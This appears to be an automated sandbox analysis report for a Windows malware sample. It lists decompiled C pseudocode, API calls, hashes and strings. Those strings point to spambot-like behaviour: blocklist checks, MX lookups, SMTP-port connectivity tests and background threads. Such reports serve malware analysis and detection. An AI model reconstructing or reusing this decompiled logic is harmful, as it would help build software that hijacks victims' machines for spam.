                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: flags_upd$hi_id$localcfg$work_srv
                                                                                • API String ID: 4207808166-1391650218
                                                                                • Opcode ID: cfd6ca314c388c613506591f5712bf4136308cb82e64ba9d4401f64ea173d9f9
                                                                                • Instruction ID: 09a8ca10aab6935decdea4a77bc1ca3f46ebe4069cf4206b77fe23513a152065
                                                                                • Opcode Fuzzy Hash: cfd6ca314c388c613506591f5712bf4136308cb82e64ba9d4401f64ea173d9f9
                                                                                • Instruction Fuzzy Hash: 4151A2B0900344AFE370BF758C85FA7BAECEB55708F00492DFAD682142D7B9A584DB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00402011() {
                                                                                				long _t35;
                                                                                				void* _t45;
                                                                                				intOrPtr _t47;
                                                                                				void* _t51;
                                                                                				char* _t53;
                                                                                				char* _t58;
                                                                                				intOrPtr _t96;
                                                                                				signed int _t102;
                                                                                				signed int _t103;
                                                                                				void* _t104;
                                                                                				void* _t122;
                                                                                
                                                                                				if(( *0x4122f4 & 0x00000001) == 0) {
                                                                                					 *0x4122f4 =  *0x4122f4 | 0x00000001;
                                                                                					 *0x4122f0 = E0040F04E(0);
                                                                                				}
                                                                                				if(( *0x4122f4 & 0x00000002) == 0) {
                                                                                					 *0x4122f4 =  *0x4122f4 | 0x00000002;
                                                                                					 *0x4122ec = E0040F04E(0);
                                                                                				}
                                                                                				if(( *0x4122f4 & 0x00000004) == 0) {
                                                                                					 *0x4122f4 =  *0x4122f4 | 0x00000004;
                                                                                					 *0x4122e8 = E0040F04E(0);
                                                                                				}
                                                                                				_t35 = GetTickCount();
                                                                                				_t96 =  *((intOrPtr*)(_t104 + 0x114));
                                                                                				if(_t35 -  *0x4122e0 > 0xdbba0) {
                                                                                					_t58 =  *0x412000; // 0x410288
                                                                                					_t103 = 0;
                                                                                					if( *_t58 != 0) {
                                                                                						_t60 = 0x412000;
                                                                                						do {
                                                                                							if(E00402684( *_t60) == 0) {
                                                                                								goto L11;
                                                                                							} else {
                                                                                								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
                                                                                								if(E00401978(_t61, 0x50) != 0) {
                                                                                									_t12 = _t96 + 0x14;
                                                                                									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
                                                                                									__eflags =  *_t12;
                                                                                								} else {
                                                                                									goto L11;
                                                                                								}
                                                                                							}
                                                                                							goto L14;
                                                                                							L11:
                                                                                							_t103 = _t103 + 1;
                                                                                							_t60 = 0x412000 + _t103 * 4;
                                                                                						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
                                                                                					}
                                                                                					L14:
                                                                                					 *0x4122e0 = GetTickCount();
                                                                                				}
                                                                                				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
                                                                                					_t53 =  *0x412000; // 0x410288
                                                                                					_t102 = 0;
                                                                                					if( *_t53 != 0) {
                                                                                						_t55 = 0x412000;
                                                                                						do {
                                                                                							if(E00402EF8( *_t55) == 0) {
                                                                                								goto L20;
                                                                                							} else {
                                                                                								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
                                                                                								if(E00401978(_t56, 0x19) != 0) {
                                                                                									_t18 = _t96 + 0x14;
                                                                                									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
                                                                                									__eflags =  *_t18;
                                                                                								} else {
                                                                                									goto L20;
                                                                                								}
                                                                                							}
                                                                                							goto L23;
                                                                                							L20:
                                                                                							_t102 = _t102 + 1;
                                                                                							_t55 = 0x412000 + _t102 * 4;
                                                                                						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
                                                                                					}
                                                                                					L23:
                                                                                					 *0x4122dc = GetTickCount();
                                                                                				}
                                                                                				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
                                                                                				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
                                                                                				_t45 = E0040F04E(0) -  *0x4122f0;
                                                                                				_t93 = "localcfg";
                                                                                				_t122 = _t45 -  *0x4122e4; // 0x0
                                                                                				if(_t122 > 0) {
                                                                                					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
                                                                                					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
                                                                                					_t104 = _t104 + 0x28;
                                                                                					if(_t51 == 0) {
                                                                                						L28:
                                                                                						 *0x4122e4 = 0x12c;
                                                                                					} else {
                                                                                						_t124 =  *((intOrPtr*)(_t104 + 0x10));
                                                                                						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
                                                                                							goto L28;
                                                                                						} else {
                                                                                							_push(_t104 + 0x10);
                                                                                							_push(_t51);
                                                                                							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
                                                                                							 *0x4122e4 = 0x4b0;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t47 = E0040F04E(0) -  *0x4122f0;
                                                                                				if(_t47 > 0x4b0) {
                                                                                					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
                                                                                					_t47 = E0040F04E(0);
                                                                                					 *0x4122f0 = _t47;
                                                                                				}
                                                                                				return _t47;
                                                                                			}

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402078
                                                                                • GetTickCount.KERNEL32 ref: 004020D4
                                                                                • GetTickCount.KERNEL32 ref: 004020DB
                                                                                • GetTickCount.KERNEL32 ref: 0040212B
                                                                                • GetTickCount.KERNEL32 ref: 00402132
                                                                                • GetTickCount.KERNEL32 ref: 00402142
                                                                                  • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000,0040E513,?,?,?,?,000000E4), ref: 0040F089
                                                                                  • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,76A1F210,80000001,00000000,0040E513,?,?,?,?,000000E4,000000C8), ref: 0040F093
                                                                                  • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                  • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                  • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                • API String ID: 3976553417-1522128867
                                                                                • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                • Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0040C2DC(void* __ebp, signed int _a4) {
                                                                                				void* _t86;
                                                                                				signed int _t90;
                                                                                				signed int _t91;
                                                                                				long _t93;
                                                                                				signed int _t95;
                                                                                				signed int _t101;
                                                                                				signed int _t108;
                                                                                				signed int _t112;
                                                                                				signed int _t115;
                                                                                				long _t117;
                                                                                				long _t118;
                                                                                				signed int _t120;
                                                                                				struct _SECURITY_ATTRIBUTES* _t122;
                                                                                				signed int _t123;
                                                                                				signed int _t132;
                                                                                				signed int _t148;
                                                                                				signed char _t151;
                                                                                				signed int _t154;
                                                                                				signed int _t156;
                                                                                				signed char* _t157;
                                                                                				void* _t158;
                                                                                				signed int _t163;
                                                                                
                                                                                				_t158 = __ebp;
                                                                                				_t157 = _a4;
                                                                                				E0040A4C7(_t157);
                                                                                				_t122 = 0;
                                                                                				if(_t157[0x44] == 0) {
                                                                                					_t157[8] = 0;
                                                                                					_t157[0x34] = 0;
                                                                                					_t157[0x38] = 0;
                                                                                					_t157[0x3c] = 0;
                                                                                					_t157[0x54] = 0;
                                                                                					_t157[0x40] = 0;
                                                                                					_t157[0x58] = 0;
                                                                                					L31:
                                                                                					_t82 =  &(_t157[4]); // 0x40c4e4
                                                                                					_t86 = _t82;
                                                                                					_t148 =  !( *_t157) & 0x00000001;
                                                                                					_t157[0x5c] = _t122;
                                                                                					_t84 =  &(_t157[8]); // 0xfffffdf0
                                                                                					if( *_t86 >=  *_t84) {
                                                                                						L34:
                                                                                						return _t86;
                                                                                					}
                                                                                					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
                                                                                					if(_t86 == _t122) {
                                                                                						goto L34;
                                                                                					}
                                                                                					return CloseHandle(_t86);
                                                                                				}
                                                                                				if(_t157[8] != 0) {
                                                                                					__eflags = _t157[0x48];
                                                                                					if(_t157[0x48] == 0) {
                                                                                						L5:
                                                                                						_t12 =  &(_t157[0x10]); // 0x59be026a
                                                                                						_t90 =  *_t12;
                                                                                						_t157[8] = _t90;
                                                                                						_t157[0x34] = _t90;
                                                                                						_t91 = _t90 * 0x3e8;
                                                                                						__eflags = _t91;
                                                                                						_t157[0x38] = _t122;
                                                                                						_t157[0x3c] = _t122;
                                                                                						_t157[0x1c] = _t90 * 0x2710;
                                                                                						_t157[0x20] = _t91;
                                                                                						goto L6;
                                                                                					}
                                                                                					_t118 = GetTickCount();
                                                                                					_t11 =  &(_t157[0x48]); // 0x13740041
                                                                                					__eflags = _t118 -  *_t11 - 0x927c0;
                                                                                					if(_t118 -  *_t11 < 0x927c0) {
                                                                                						goto L6;
                                                                                					}
                                                                                					goto L5;
                                                                                				} else {
                                                                                					_t4 =  &(_t157[0xc]); // 0x5756c359
                                                                                					_t120 =  *_t4;
                                                                                					_t157[0x1c] = _t120 * 0x2710;
                                                                                					_t157[8] = _t120;
                                                                                					_t157[0x20] = _t120 * 0x3e8;
                                                                                					_t157[0x34] = _t120;
                                                                                					_t157[0x48] = GetTickCount();
                                                                                					L6:
                                                                                					if(( *_t157 & 0x00000001) == 0) {
                                                                                						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
                                                                                						_t157[8] =  *_t73;
                                                                                						goto L31;
                                                                                					}
                                                                                					_t93 = GetTickCount();
                                                                                					_t21 =  &(_t157[0x4c]); // 0x26fce850
                                                                                					if(_t93 -  *_t21 >= 0x2710) {
                                                                                						goto L31;
                                                                                					}
                                                                                					if(_t157[0x54] == _t122) {
                                                                                						_t95 = 0x3e8;
                                                                                					} else {
                                                                                						_t117 = GetTickCount();
                                                                                						_t23 =  &(_t157[0x54]); // 0x41366c1d
                                                                                						_t95 = _t117 -  *_t23;
                                                                                					}
                                                                                					_t123 = _t95;
                                                                                					if(_t95 < 1) {
                                                                                						_t123 = 1;
                                                                                					}
                                                                                					if(_t123 > 0x4e20) {
                                                                                						_t123 = 0x4e20;
                                                                                					}
                                                                                					_t24 =  &(_t157[0x58]); // 0x701d8900
                                                                                					_t25 =  &(_t157[0x40]); // 0x74c33b57
                                                                                					_t151 =  *_t25;
                                                                                					_t132 =  *_t24 * 0x3e8;
                                                                                					_push(_t158);
                                                                                					asm("cdq");
                                                                                					_push(0x14);
                                                                                					_a4 = _t123;
                                                                                					asm("cdq");
                                                                                					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
                                                                                					if(_t101 == 0) {
                                                                                						__eflags = _t132 - _t151;
                                                                                						if(__eflags == 0) {
                                                                                							goto L22;
                                                                                						}
                                                                                						if(__eflags >= 0) {
                                                                                							_t156 = _t151 + 1;
                                                                                							__eflags = _t156;
                                                                                						} else {
                                                                                							_t156 = _t151 - 1;
                                                                                						}
                                                                                						goto L21;
                                                                                					} else {
                                                                                						_t156 = _t151 + _t101;
                                                                                						L21:
                                                                                						_t157[0x40] = _t156;
                                                                                						L22:
                                                                                						if(_t157[0x40] < 0) {
                                                                                							_t157[0x40] = _t157[0x40] & 0x00000000;
                                                                                						}
                                                                                						_t39 =  &(_t157[0x40]); // 0x74c33b57
                                                                                						_t163 = (0xc8 -  *_t39) * 0x14;
                                                                                						if(_t123 > 0x3e8) {
                                                                                							_a4 = 0x3e8;
                                                                                						}
                                                                                						asm("cdq");
                                                                                						_t46 =  &(_t157[0x14]); // 0x5f004120
                                                                                						_t47 =  &(_t157[0x10]); // 0x59be026a
                                                                                						asm("cdq");
                                                                                						_t49 =  &(_t157[0x30]); // 0xe4754f45
                                                                                						_t54 =  &(_t157[0x20]); // 0x406a0000
                                                                                						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
                                                                                						asm("cdq");
                                                                                						_t56 =  &(_t157[0x2c]); // 0xc68314c4
                                                                                						_t157[0x20] = _t108;
                                                                                						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
                                                                                						asm("cdq");
                                                                                						_t122 = 0;
                                                                                						_t157[0x58] = 0;
                                                                                						_t154 = _t112 / 0x3e8;
                                                                                						_t157[0x54] = GetTickCount();
                                                                                						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
                                                                                						_t115 =  *_t68;
                                                                                						if(_t115 <= _t154) {
                                                                                							_t157[8] = _t115;
                                                                                							_t157[0x20] = _t115 * 0x3e8;
                                                                                						} else {
                                                                                							_t157[8] = _t154;
                                                                                							_t157[0x1c] = _t154 * 0x2710;
                                                                                						}
                                                                                						goto L31;
                                                                                					}
                                                                                				}
                                                                                			}

                                                                                0x0040c2dc
                                                                                0x0040c2de
                                                                                0x0040c2e4
                                                                                0x0040c2e9
                                                                                0x0040c2ef
                                                                                0x0040c482
                                                                                0x0040c485
                                                                                0x0040c488
                                                                                0x0040c48b
                                                                                0x0040c48e
                                                                                0x0040c491
                                                                                0x0040c494
                                                                                0x0040c497
                                                                                0x0040c499
                                                                                0x0040c499
                                                                                0x0040c4a0
                                                                                0x0040c4a3
                                                                                0x0040c4a6
                                                                                0x0040c4a9
                                                                                0x0040c4d5
                                                                                0x0040c4d5
                                                                                0x0040c4d5
                                                                                0x0040c4c1
                                                                                0x0040c4c9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c4cc
                                                                                0x0040c2fe
                                                                                0x0040c326
                                                                                0x0040c329
                                                                                0x0040c337
                                                                                0x0040c337
                                                                                0x0040c337
                                                                                0x0040c342
                                                                                0x0040c345
                                                                                0x0040c348
                                                                                0x0040c348
                                                                                0x0040c34e
                                                                                0x0040c351
                                                                                0x0040c354
                                                                                0x0040c357
                                                                                0x00000000
                                                                                0x0040c357
                                                                                0x0040c32b
                                                                                0x0040c32d
                                                                                0x0040c330
                                                                                0x0040c335
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c300
                                                                                0x0040c300
                                                                                0x0040c300
                                                                                0x0040c30b
                                                                                0x0040c316
                                                                                0x0040c319
                                                                                0x0040c31c
                                                                                0x0040c321
                                                                                0x0040c35a
                                                                                0x0040c35d
                                                                                0x0040c47a
                                                                                0x0040c47d
                                                                                0x00000000
                                                                                0x0040c47d
                                                                                0x0040c363
                                                                                0x0040c365
                                                                                0x0040c36d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c376
                                                                                0x0040c37f
                                                                                0x0040c378
                                                                                0x0040c378
                                                                                0x0040c37a
                                                                                0x0040c37a
                                                                                0x0040c37a
                                                                                0x0040c384
                                                                                0x0040c389
                                                                                0x0040c38d
                                                                                0x0040c38d
                                                                                0x0040c395
                                                                                0x0040c397
                                                                                0x0040c397
                                                                                0x0040c399
                                                                                0x0040c39c
                                                                                0x0040c39c
                                                                                0x0040c39f
                                                                                0x0040c3ac
                                                                                0x0040c3ad
                                                                                0x0040c3b5
                                                                                0x0040c3b8
                                                                                0x0040c3bc
                                                                                0x0040c3bd
                                                                                0x0040c3c1
                                                                                0x0040c3c7
                                                                                0x0040c3c9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c3cb
                                                                                0x0040c3d0
                                                                                0x0040c3d0
                                                                                0x0040c3cd
                                                                                0x0040c3cd
                                                                                0x0040c3cd
                                                                                0x00000000
                                                                                0x0040c3c3
                                                                                0x0040c3c3
                                                                                0x0040c3d1
                                                                                0x0040c3d1
                                                                                0x0040c3d4
                                                                                0x0040c3d8
                                                                                0x0040c3da
                                                                                0x0040c3da
                                                                                0x0040c3e3
                                                                                0x0040c3eb
                                                                                0x0040c3f0
                                                                                0x0040c3f2
                                                                                0x0040c3f2
                                                                                0x0040c3fd
                                                                                0x0040c405
                                                                                0x0040c408
                                                                                0x0040c419
                                                                                0x0040c41a
                                                                                0x0040c41d
                                                                                0x0040c421
                                                                                0x0040c42a
                                                                                0x0040c42b
                                                                                0x0040c430
                                                                                0x0040c436
                                                                                0x0040c43b
                                                                                0x0040c443
                                                                                0x0040c448
                                                                                0x0040c44b
                                                                                0x0040c453
                                                                                0x0040c456
                                                                                0x0040c456
                                                                                0x0040c45c
                                                                                0x0040c46c
                                                                                0x0040c475
                                                                                0x0040c45e
                                                                                0x0040c45e
                                                                                0x0040c467
                                                                                0x0040c467
                                                                                0x00000000
                                                                                0x0040c45c
                                                                                0x0040c3c1

                                                                                APIs
                                                                                  • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                  • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                • GetTickCount.KERNEL32 ref: 0040C363
                                                                                • GetTickCount.KERNEL32 ref: 0040C378
                                                                                • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                • CreateThread.KERNEL32 ref: 0040C4C1
                                                                                • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                • String ID: localcfg
                                                                                • API String ID: 1553760989-1857712256
                                                                                • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 02083068
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02083078
                                                                                • GetProcAddress.KERNEL32(00000000,00410408), ref: 02083095
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 020830B6
                                                                                • htons.WS2_32(00000035), ref: 020830EF
                                                                                • inet_addr.WS2_32(?), ref: 020830FA
                                                                                • gethostbyname.WS2_32(?), ref: 0208310D
                                                                                • HeapFree.KERNEL32(00000000), ref: 0208314D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: iphlpapi.dll
                                                                                • API String ID: 2869546040-3565520932
                                                                                • Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                • Instruction ID: eeffcc8ca208f68e89b0066492fda497da2aee10249669ccbcdfbe4c173ffa14
                                                                                • Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                • Instruction Fuzzy Hash: 7C31D331A00306ABDF52ABB8DC48BBF77F8AF84F24F1441A5E558E3290DB74D5819B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E00402D21(intOrPtr _a4) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				void* _v16;
                                                                                				char _v28;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				_Unknown_base(*)()* _t20;
                                                                                				long* _t30;
                                                                                				intOrPtr* _t37;
                                                                                				long _t39;
                                                                                				long _t40;
                                                                                				void* _t41;
                                                                                
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsw");
                                                                                				asm("movsb");
                                                                                				_t19 = GetModuleHandleA( &_v28);
                                                                                				_t39 = 0;
                                                                                				if(_t19 != 0) {
                                                                                					L3:
                                                                                					_t20 = GetProcAddress(_t19, "DnsQuery_A");
                                                                                					if(_t20 == _t39) {
                                                                                						L2:
                                                                                						return 0;
                                                                                					}
                                                                                					_push(_t39);
                                                                                					_t35 =  &_v16;
                                                                                					_push( &_v16);
                                                                                					_push(_t39);
                                                                                					_push(_t39);
                                                                                					_push(0xf);
                                                                                					_push(_a4);
                                                                                					if( *_t20() != 0) {
                                                                                						goto L2;
                                                                                					}
                                                                                					_t37 = _v16;
                                                                                					_v8 = _t39;
                                                                                					_v12 = _t39;
                                                                                					if(_t37 == _t39) {
                                                                                						L14:
                                                                                						return _v12;
                                                                                					}
                                                                                					do {
                                                                                						if( *((short*)(_t37 + 8)) != 0xf) {
                                                                                							goto L12;
                                                                                						}
                                                                                						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
                                                                                						if(_t40 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						E0040EE2A(_t35, _t40, 0, 0x108);
                                                                                						_t41 = _t41 + 0xc;
                                                                                						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
                                                                                						_t13 = _t40 + 8; // 0x8
                                                                                						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
                                                                                						_t30 = _v8;
                                                                                						_v8 = _t40;
                                                                                						if(_t30 != 0) {
                                                                                							 *_t30 = _t40;
                                                                                						} else {
                                                                                							_v12 = _t40;
                                                                                						}
                                                                                						L12:
                                                                                						_t37 =  *_t37;
                                                                                						_t39 = 0;
                                                                                					} while (_t37 != 0);
                                                                                					goto L14;
                                                                                				}
                                                                                				_t19 = LoadLibraryA( &_v28);
                                                                                				if(_t19 != 0) {
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L2;
                                                                                			}
                                                                                Address column (one instruction address per decompiled statement above, 0x00402d31 through 0x00402deb; the per-statement mapping was detached from the code during extraction)

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                • String ID: DnsQuery_A$dnsapi.dll
                                                                                • API String ID: 3560063639-3847274415
                                                                                • Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                • Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E00406CC9(void* __ecx) {
                                                                                				_Unknown_base(*)()* _t8;
                                                                                				CHAR* _t17;
                                                                                				void* _t18;
                                                                                				void* _t23;
                                                                                				char _t25;
                                                                                				void* _t34;
                                                                                
                                                                                				_t23 = __ecx;
                                                                                				if( *0x412e08 != 0) {
                                                                                					L14:
                                                                                					return 0x412e08;
                                                                                				}
                                                                                				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
                                                                                				if(_t8 == 0) {
                                                                                					L4:
                                                                                					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
                                                                                						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
                                                                                							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
                                                                                							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                							_t34 = _t34 + 0x28;
                                                                                						}
                                                                                						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
                                                                                						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                					}
                                                                                					L10:
                                                                                					_t17 = 0x412e08;
                                                                                					goto L11;
                                                                                					L11:
                                                                                					_t25 =  *_t17;
                                                                                					_t17 =  &(_t17[1]);
                                                                                					if(_t25 != 0) {
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_t18 = _t17 - 0x412e09;
                                                                                						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
                                                                                							 *((char*)(_t18 + 0x412e08)) = 0x5c;
                                                                                							 *((char*)(_t18 + 0x412e09)) = _t25;
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                				_push(0x104);
                                                                                				_push(0x412e08);
                                                                                				if( *_t8() == 0 ||  *0x412e08 == 0) {
                                                                                					goto L4;
                                                                                				} else {
                                                                                					goto L10;
                                                                                				}
                                                                                			}
                                                                                Address column (one instruction address per decompiled statement above, 0x00406cc9 through 0x00406dc1; the per-statement mapping was detached from the code during extraction)

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                Strings
                                                                                Memory Dump Source
